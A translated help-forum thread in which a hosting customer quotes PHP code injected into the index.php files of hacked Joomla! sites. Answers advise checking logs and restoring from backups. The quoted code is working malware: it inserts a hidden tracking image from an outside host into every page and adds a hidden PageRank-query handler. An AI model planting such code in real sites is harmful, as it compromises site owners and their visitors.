可能重复:
我的服务器被黑了 紧急求助
我的一台服务器上托管的所有 Joomla! 网站均遭到黑客攻击,并且以下代码被注入到许多目录中的 index.php 文件中。
<?php
//{{126104ed
GLOBAL $alreadyxxx;
if($alreadyxxx != 1)
{
$alreadyxxx = 1;
$olderrxxx=error_reporting(0);
function outputxxx_callback($str)
{
$links = '<SPAN STYLE="font-style: normal; visibility: hidden; position: absolute; left: 0px; top: 0px;"><div id="af4dae82ae67843a194c001162"><img width=0 height=0 src="http://airschk.com/countbk.gif?id=4dae82ae67843a194c001162&p=1&a=%91P%BC%BCQ%F7%20%7C6%BE%0A8%F52%9C%F5nT%82%8A%C8V%27%A1%1E%85%1B%16%DBh%F2%A3U%10%9Dh%9C%FF%B6t%0F%B2%E9%18"></div></SPAN>';
preg_match("|</body>|si",$str,$arr);
return str_replace($arr[0],$links.$arr[0],$str);
}
function StrToNum($Str, $Check, $Magic)
{
$Int32Unit = 4294967296;
$length = strlen($Str);
for ($i = 0; $i < $length; $i++) {
$Check *= $Magic;
if ($Check >= $Int32Unit) {
$Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit));
$Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check;
}
$Check += ord($Str{$i});
}
return $Check;
}
function HashURL($String)
{
$Check1 = StrToNum($String, 0x1505, 0x21);
$Check2 = StrToNum($String, 0, 0x1003F);
$Check1 >>= 2;
$Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F);
$Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF);
$Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF);
$T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F );
$T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 );
return ($T1 | $T2);
}
function CheckHash($Hashnum)
{
$CheckByte = 0;
$Flag = 0;
$HashStr = sprintf('%u', $Hashnum) ;
$length = strlen($HashStr);
for ($i = $length-1; $i >= 0; $i--) {
$Re = $HashStr{$i};
if (1 === ($Flag % 2)) {
$Re += $Re;
$Re = (int)($Re / 10) + ($Re % 10);
}
$CheckByte += $Re;
$Flag ++;
}
$CheckByte %= 10;
if (0 !== $CheckByte) {
$CheckByte = 10 - $CheckByte;
if (1 === ($Flag % 2) ) {
if (1 === ($CheckByte % 2)) {
$CheckByte += 9;
}
$CheckByte >>= 1;
}
}
return '7'.$CheckByte.$HashStr;
}
function getpr($url)
{
$ch = CheckHash(HashURL($url));
$file = "http://toolbarqueries.google.com/search?client=navclient-auto&ch=$ch&features=Rank&q=info:$url";;
$data = file_get_contents($file);
$pos = strpos($data, "Rank_");
if($pos === false){return -1;} else{
$pr=substr($data, $pos + 9);
$pr=trim($pr);
$pr=str_replace("
",'',$pr);
return $pr;
}
}
if(isset($_POST['xxxprch']))
{
echo getpr($_POST['xxxprch']);
exit();
}
else
ob_start('outputxxx_callback');
error_reporting($olderrxxx);
}
//}}861921ab
据我所知,根据所有文档,我的 Joomla! 网站是安全的。然而,同一台服务器上的所有网站同时遭到黑客攻击。是主机的错吗?
有人知道我应该从哪里开始清理这个烂摊子吗?除了我的网站备份之外,还有其他快速解决方案吗?
我最大的疑问是,追踪黑客到其网站、服务器或位置的最佳方法是什么?我真的想对他们的工作表示感谢。
答案1
我猜他们用木马病毒获取了你服务器的密码。尽快检查你的电脑,特别是如果你把服务器密码存储在任何程序中(浏览器、ftp 客户端、total commander 等)。顺便说一句:我假设你使用的是 Windows
关于追踪黑客,这并不容易。首先检查发生这种情况时的访问日志。您可能会在那里看到大量的 ftp 活动。查看这些日志的 IP。如果它们全都不同,那么他可能正在使用僵尸计算机,您不太可能找到他。如果它们全都相同,那么您可能会幸运一点。
无论如何,这听起来像是一次自动攻击。搜索一下,看看其他网站(不在您的服务器中)是否也注入了相同的代码。
答案2
“据我所知,根据所有文件,我的 Joomla!网站是安全的。”
这句话就是你遇到的第一个问题。如果你在 Google 上搜索“joomla hacked”,仅在过去一个月就有 280,000 个结果...
至于恢复,我不会相信任何比从已知良好的备份中恢复更糟糕的事情。这些编辑只是你发现的。谁知道那里可能还放了什么。
为了找到它们,你可能需要先阅读以下内容:http://kb.siteground.com/article/Joomla_hacked.html
简而言之,我认为你的机会几乎为零。但是,如果你恰好有雄厚的资金或政府支持,机会就会增加几个百分点。
答案3
您没有提供足够的细节来帮助我们解决问题,这几乎肯定是一次自动攻击,尝试追踪它只会浪费您的时间。
没有快速的方法可以恢复。来自轨道的核弹从已知良好的备份中恢复是唯一的方法。